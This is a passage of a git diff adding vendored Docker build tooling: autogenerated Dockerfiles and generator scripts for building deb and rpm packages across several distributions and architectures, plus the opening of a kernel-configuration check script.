b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile new file mode 100644 index 0000000000..4f8cc66769 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! +# + +FROM ppc64le/ubuntu:yakkety + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh new file mode 100755 index 0000000000..8271d9dc47 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh @@ -0,0 +1,10 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +set -x +./generate.sh +for d in */; do + docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh new file mode 100755 index 0000000000..b8f5860844 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh @@ -0,0 +1,96 @@ +#!/bin/bash +set -e + +# This file is used to auto-generate Dockerfiles for making debs via 'make deb' +# +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in this directory +# or: ./generate.sh ubuntu-xenial +# to only update ubuntu-xenial/Dockerfile +# or: ./generate.sh ubuntu-newversion +# to create a new folder and a Dockerfile within it + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for version in "${versions[@]}"; do + echo "${versions[@]}" + distro="${version%-*}" + suite="${version##*-}" + from="s390x/${distro}:${suite}" + + mkdir -p "$version" + echo "$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"! + # + + FROM $from + + EOF + + extraBuildTags='pkcs11' + runcBuildTags= + + # this list is sorted alphabetically; please keep it that way + packages=( + apparmor # for apparmor_parser for testing the profile + bash-completion # for bash-completion debhelper integration + btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) + build-essential # "essential for building Debian packages" + cmake # tini dep + curl ca-certificates # for downloading Go + debhelper # for easy ".deb" building + dh-apparmor # for apparmor debhelper + dh-systemd # for systemd debhelper integration + git # for "git commit" info in "docker -v" + libapparmor-dev # for "sys/apparmor.h" + libdevmapper-dev # for "libdevmapper.h" + libltdl-dev # for pkcs11 "ltdl.h" + libseccomp-dev # for "seccomp.h" & "libseccomp.so" + libsqlite3-dev # for "sqlite3.h" + pkg-config # for detecting things like libsystemd-journal dynamically + libsystemd-dev + vim-common # tini dep + ) + + case "$suite" in + # s390x needs libseccomp 2.3.1 + xenial) + # Ubuntu Xenial has libseccomp 2.2.3 + runcBuildTags="apparmor selinux" + ;; + *) + extraBuildTags+=' seccomp' + runcBuildTags="apparmor selinux seccomp" + ;; + esac + + # update and install packages + echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" + echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" + echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + # print build tags in alphabetical order + buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) + + echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" + echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile new file mode 100644 index 0000000000..6d7e4c574b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"! +# + +FROM s390x/ubuntu:xenial + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config libsystemd-dev vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md new file mode 100644 index 0000000000..5f2e888c7a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md @@ -0,0 +1,5 @@ +# `dockercore/builder-rpm` + +This image's tags contain the dependencies for building Docker `.rpm`s for each of the RPM-based platforms Docker targets. + +To add new tags, see [`contrib/builder/rpm/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/rpm/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file. diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh new file mode 100755 index 0000000000..558f7ee0db --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh @@ -0,0 +1,10 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +set -x +./generate.sh +for d in */; do + docker build -t "dockercore/builder-rpm:$(basename "$d")" "$d" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile new file mode 100644 index 0000000000..1f841631ca --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile @@ -0,0 +1,19 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! +# + +FROM centos:7 + +RUN yum groupinstall -y "Development Tools" +RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs +RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS seccomp selinux + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile new file mode 100644 index 0000000000..af040c5c9f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile @@ -0,0 +1,19 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! +# + +FROM fedora:24 + +RUN dnf -y upgrade +RUN dnf install -y @development-tools fedora-packager +RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS seccomp selinux + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile new file mode 100644 index 0000000000..98e57a9c4b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile @@ -0,0 +1,19 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! +# + +FROM fedora:25 + +RUN dnf -y upgrade +RUN dnf install -y @development-tools fedora-packager +RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS seccomp selinux + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh new file mode 100755 index 0000000000..6f93afafa3 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh @@ -0,0 +1,189 @@ +#!/bin/bash +set -e + +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in this directory +# or: ./generate.sh centos-7 +# to only update centos-7/Dockerfile +# or: ./generate.sh fedora-newversion +# to create a new folder and a Dockerfile within it + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for version in "${versions[@]}"; do + distro="${version%-*}" + suite="${version##*-}" + from="${distro}:${suite}" + installer=yum + + if [[ "$distro" == "fedora" ]]; then + installer=dnf + fi + if [[ "$distro" == "photon" ]]; then + installer=tdnf + fi + + mkdir -p "$version" + echo "$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! + # + + FROM $from + EOF + + echo >> "$version/Dockerfile" + + extraBuildTags='pkcs11' + runcBuildTags= + + case "$from" in + oraclelinux:6) + # We need a known version of the kernel-uek-devel headers to set CGO_CPPFLAGS, so grab the UEKR4 GA version + # This requires using yum-config-manager from yum-utils to enable the UEKR4 yum repo + echo "RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4" >> "$version/Dockerfile" + echo "RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek" >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + ;; + fedora:*) + echo "RUN ${installer} -y upgrade" >> "$version/Dockerfile" + ;; + *) ;; + esac + + case "$from" in + centos:*) + # get "Development Tools" packages dependencies + echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile" + + if [[ "$version" == "centos-7" ]]; then + echo 'RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs' >> "$version/Dockerfile" + fi + ;; + oraclelinux:*) + # get "Development Tools" packages and dependencies + # we also need yum-utils for yum-config-manager to pull the latest repo file + echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile" + ;; + opensuse:*) + # get rpm-build and curl packages and dependencies + echo 'RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build' >> "$version/Dockerfile" + ;; + photon:*) + echo "RUN ${installer} install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils" >> "$version/Dockerfile" + ;; + *) + echo "RUN ${installer} install -y @development-tools fedora-packager" >> "$version/Dockerfile" + ;; + esac + + packages=( + btrfs-progs-devel # for "btrfs/ioctl.h" (and "version.h" if possible) + device-mapper-devel # for "libdevmapper.h" + glibc-static + libseccomp-devel # for "seccomp.h" & "libseccomp.so" + libselinux-devel # for "libselinux.so" + libtool-ltdl-devel # for pkcs11 "ltdl.h" + pkgconfig # for the pkg-config command + selinux-policy + selinux-policy-devel + sqlite-devel # for "sqlite3.h" + systemd-devel # for "sd-journal.h" and libraries + tar # older versions of dev-tools do not have tar + git # required for containerd and runc clone + cmake # tini build + vim-common # tini build + ) + + case "$from" in + oraclelinux:7) + # Enable the optional repository + packages=( --enablerepo=ol7_optional_latest "${packages[*]}" ) + ;; + esac + + case "$from" in + oraclelinux:6) + # doesn't use systemd, doesn't have a devel package for it + packages=( "${packages[@]/systemd-devel}" ) + ;; + esac + + # opensuse & oraclelinx:6 do not have the right libseccomp libs + case "$from" in + opensuse:*|oraclelinux:6) + packages=( "${packages[@]/libseccomp-devel}" ) + runcBuildTags="selinux" + ;; + *) + extraBuildTags+=' seccomp' + runcBuildTags="seccomp selinux" + ;; + esac + + case "$from" in + opensuse:*) + packages=( "${packages[@]/btrfs-progs-devel/libbtrfs-devel}" ) + packages=( "${packages[@]/pkgconfig/pkg-config}" ) + packages=( "${packages[@]/vim-common/vim}" ) + if [[ "$from" == "opensuse:13."* ]]; then + packages+=( systemd-rpm-macros ) + fi + + # use zypper + echo "RUN zypper --non-interactive install ${packages[*]}" >> "$version/Dockerfile" + ;; + photon:*) + packages=( "${packages[@]/pkgconfig/pkg-config}" ) + echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile" + ;; + *) + echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile" + ;; + esac + + echo >> "$version/Dockerfile" + + + awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" + echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" + echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + # print build tags in alphabetical order + buildTags=$( echo "selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) + + echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" + echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + case "$from" in + oraclelinux:6) + # We need to set the CGO_CPPFLAGS environment to use the updated UEKR4 headers with all the userns stuff. + # The ordering is very important and should not be changed. + echo 'ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \' >> "$version/Dockerfile" + echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \' >> "$version/Dockerfile" + echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \' >> "$version/Dockerfile" + echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \' >> "$version/Dockerfile" + echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \' >> "$version/Dockerfile" + echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + ;; + *) ;; + esac + + +done diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile new file mode 100644 index 0000000000..addd431508 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile @@ -0,0 +1,18 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! +# + +FROM opensuse:13.2 + +RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build +RUN zypper --non-interactive install libbtrfs-devel device-mapper-devel glibc-static libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim systemd-rpm-macros + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 selinux +ENV RUNC_BUILDTAGS selinux + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile new file mode 100644 index 0000000000..c34d3046dd --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile @@ -0,0 +1,28 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! +# + +FROM oraclelinux:6 + +RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4 +RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek + +RUN yum groupinstall -y "Development Tools" +RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 selinux +ENV RUNC_BUILDTAGS selinux + +ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \ + -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \ + -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \ + -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \ + -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \ + -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile new file mode 100644 index 0000000000..378536b647 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile @@ -0,0 +1,18 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! +# + +FROM oraclelinux:7 + +RUN yum groupinstall -y "Development Tools" +RUN yum install -y --enablerepo=ol7_optional_latest btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS seccomp selinux + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile new file mode 100644 index 0000000000..b77d573d9f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile @@ -0,0 +1,18 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! +# + +FROM photon:1.0 + +RUN tdnf install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils +RUN tdnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS seccomp selinux + diff --git a/vendor/github.com/docker/docker/contrib/check-config.sh b/vendor/github.com/docker/docker/contrib/check-config.sh new file mode 100755 index 0000000000..d07e4ce368 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/check-config.sh @@ -0,0 +1,354 @@ +#!/usr/bin/env bash +set -e + +EXITCODE=0 + +# bits of this were adapted from lxc-checkconfig +# see also https://github.com/lxc/lxc/blob/lxc-1.0.2/src/lxc/lxc-checkconfig.in + +possibleConfigs=( + '/proc/config.gz' + "/boot/config-$(uname -r)" + "/usr/src/linux-$(uname -r)/.config" + '/usr/src/linux/.config' +) + +if [ $# -gt 0 ]; then + CONFIG="$1" +else + : ${CONFIG:="${possibleConfigs[0]}"} +fi + +if ! command -v zgrep &> /dev/null; then + zgrep() { + zcat "$2" | grep "$1" + } +fi + +kernelVersion="$(uname -r)" +kernelMajor="${kernelVersion%%.*}" +kernelMinor="${kernelVersion#$kernelMajor.}" +kernelMinor="${kernelMinor%%.*}" + +is_set() { + zgrep "CONFIG_$1=[y|m]" "$CONFIG" > /dev/null +} +is_set_in_kernel() { + zgrep "CONFIG_$1=y" "$CONFIG" > /dev/null +} +is_set_as_module() { + zgrep "CONFIG_$1=m" "$CONFIG" > /dev/null +} + +color() { + local codes=() + if [ "$1" = 'bold' ]; then + codes=( "${codes[@]}" '1' ) + shift + fi + if [ "$#" -gt 0 ]; then + local code= + case "$1" in + # see https://en.wikipedia.org/wiki/ANSI_escape_code#Colors + black) code=30 ;; + red) code=31 ;; + green) code=32 ;; + yellow) code=33 ;; + blue) code=34 ;; + magenta) code=35 ;; + cyan) code=36 ;; + white) code=37 ;; + esac + if [ "$code" ]; then + codes=( "${codes[@]}" "$code" ) + fi + fi + local IFS=';' + echo -en '\033['"${codes[*]}"'m' +} +wrap_color() { + text="$1" + shift + color "$@" + echo -n "$text" + color reset + echo +} + +wrap_good() { + echo "$(wrap_color "$1" white): $(wrap_color "$2" green)" +} +wrap_bad() { + echo "$(wrap_color "$1" bold): $(wrap_color "$2" bold red)" +} +wrap_warning() { + wrap_color >&2 "$*" red +} + +check_flag() { + if is_set_in_kernel "$1"; then + wrap_good "CONFIG_$1" 'enabled' + elif is_set_as_module "$1"; then + wrap_good "CONFIG_$1" 'enabled (as module)' + else + wrap_bad "CONFIG_$1" 'missing' + EXITCODE=1 + fi +} + +check_flags() { + for flag in "$@"; do + echo -n "- "; check_flag "$flag" + done +} + +check_command() { + if command -v "$1" >/dev/null 2>&1; then + wrap_good "$1 command" 'available' + else + wrap_bad "$1 command" 'missing' + EXITCODE=1 + fi +} + +check_device() { + if [ -c "$1" ]; then + wrap_good "$1" 'present' + else + wrap_bad "$1" 'missing' + EXITCODE=1 + fi +} + +check_distro_userns() { + source /etc/os-release 2>/dev/null || /bin/true + if [[ "${ID}" =~ ^(centos|rhel)$ && "${VERSION_ID}" =~ ^7 ]]; then + # this is a CentOS7 or RHEL7 system + grep -q "user_namespace.enable=1" /proc/cmdline || { + # no user namespace support enabled + wrap_bad " (RHEL7/CentOS7" "User namespaces disabled; add 'user_namespace.enable=1' to boot command line)" + EXITCODE=1 + } + fi +} + +if [ ! -e "$CONFIG" ]; then + wrap_warning "warning: $CONFIG does not exist, searching other paths for kernel config ..." + for tryConfig in "${possibleConfigs[@]}"; do + if [ -e "$tryConfig" ]; then + CONFIG="$tryConfig" + break + fi + done + if [ ! -e "$CONFIG" ]; then + wrap_warning "error: cannot find kernel config" + wrap_warning " try running this script again, specifying the kernel config:" + wrap_warning " CONFIG=/path/to/kernel/.config $0 or $0 /path/to/kernel/.config" + exit 1 + fi +fi + +wrap_color "info: reading kernel config from $CONFIG ..." white +echo + +echo 'Generally Necessary:' + +echo -n '- ' +cgroupSubsystemDir="$(awk '/[, ](cpu|cpuacct|cpuset|devices|freezer|memory)[, ]/ && $3 == "cgroup" { print $2 }' /proc/mounts | head -n1)" +cgroupDir="$(dirname "$cgroupSubsystemDir")" +if [ -d "$cgroupDir/cpu" -o -d "$cgroupDir/cpuacct" -o -d "$cgroupDir/cpuset" -o -d "$cgroupDir/devices" -o -d "$cgroupDir/freezer" -o -d "$cgroupDir/memory" ]; then + echo "$(wrap_good 'cgroup hierarchy' 'properly mounted') [$cgroupDir]" +else + if [ "$cgroupSubsystemDir" ]; then + echo "$(wrap_bad 'cgroup hierarchy' 'single mountpoint!') [$cgroupSubsystemDir]" + else + echo "$(wrap_bad 'cgroup hierarchy' 'nonexistent??')" + fi + EXITCODE=1 + echo " $(wrap_color '(see https://github.com/tianon/cgroupfs-mount)' yellow)" +fi + +if [ "$(cat /sys/module/apparmor/parameters/enabled 2>/dev/null)" = 'Y' ]; then + echo -n '- ' + if command -v apparmor_parser &> /dev/null; then + echo "$(wrap_good 'apparmor' 'enabled and tools installed')" + else + echo "$(wrap_bad 'apparmor' 'enabled, but apparmor_parser missing')" + echo -n ' ' + if command -v apt-get &> /dev/null; then + echo "$(wrap_color '(use "apt-get install apparmor" to fix this)')" + elif command -v yum &> /dev/null; then + echo "$(wrap_color '(your best bet is "yum install apparmor-parser")')" + else + echo "$(wrap_color '(look for an "apparmor" package for your distribution)')" + fi + EXITCODE=1 + fi +fi + +flags=( + NAMESPACES {NET,PID,IPC,UTS}_NS + CGROUPS CGROUP_CPUACCT CGROUP_DEVICE CGROUP_FREEZER CGROUP_SCHED CPUSETS MEMCG + KEYS + VETH BRIDGE BRIDGE_NETFILTER + NF_NAT_IPV4 IP_NF_FILTER IP_NF_TARGET_MASQUERADE + NETFILTER_XT_MATCH_{ADDRTYPE,CONNTRACK,IPVS} + IP_NF_NAT NF_NAT NF_NAT_NEEDED + + # required for bind-mounting /dev/mqueue into containers + POSIX_MQUEUE +) +check_flags "${flags[@]}" +if [ "$kernelMajor" -lt 4 ] || [ "$kernelMajor" -eq 4 -a "$kernelMinor" -lt 8 ]; then + check_flags DEVPTS_MULTIPLE_INSTANCES +fi + +echo + +echo 'Optional Features:' +{ + check_flags USER_NS + check_distro_userns +} +{ + check_flags SECCOMP +} +{ + check_flags CGROUP_PIDS +} +{ + check_flags MEMCG_SWAP MEMCG_SWAP_ENABLED + if is_set MEMCG_SWAP && ! is_set MEMCG_SWAP_ENABLED; then + echo " $(wrap_color '(note that cgroup swap accounting is not enabled in your kernel config, you can enable it by setting boot option "swapaccount=1")' bold black)" + fi +} +{ + if is_set LEGACY_VSYSCALL_NATIVE; then + echo -n "- "; wrap_bad "CONFIG_LEGACY_VSYSCALL_NATIVE" 'enabled' + echo " $(wrap_color '(dangerous, provides an ASLR-bypassing target with usable ROP gadgets.)' bold black)" + elif is_set LEGACY_VSYSCALL_EMULATE; then + echo -n "- "; wrap_good "CONFIG_LEGACY_VSYSCALL_EMULATE" 'enabled' + elif is_set LEGACY_VSYSCALL_NONE; then + echo -n "- "; wrap_bad "CONFIG_LEGACY_VSYSCALL_NONE" 'enabled' + echo " $(wrap_color '(containers using eglibc <= 2.13 will not work. Switch to' bold black)" + echo " $(wrap_color ' "CONFIG_VSYSCALL_[NATIVE|EMULATE]" or use "vsyscall=[native|emulate]"' bold black)" + echo " $(wrap_color ' on kernel command line. Note that this will disable ASLR for the,' bold black)" + echo " $(wrap_color ' VDSO which may assist in exploiting security vulnerabilities.)' bold black)" + # else Older kernels (prior to 3dc33bd30f3e, released in v4.40-rc1) do + # not have these LEGACY_VSYSCALL options and are effectively + # LEGACY_VSYSCALL_EMULATE. Even older kernels are presumably + # effectively LEGACY_VSYSCALL_NATIVE. + fi +} + +if [ "$kernelMajor" -lt 4 ] || [ "$kernelMajor" -eq 4 -a "$kernelMinor" -le 5 ]; then + check_flags MEMCG_KMEM +fi + +if [ "$kernelMajor" -lt 3 ] || [ "$kernelMajor" -eq 3 -a "$kernelMinor" -le 18 ]; then + check_flags RESOURCE_COUNTERS +fi + +if 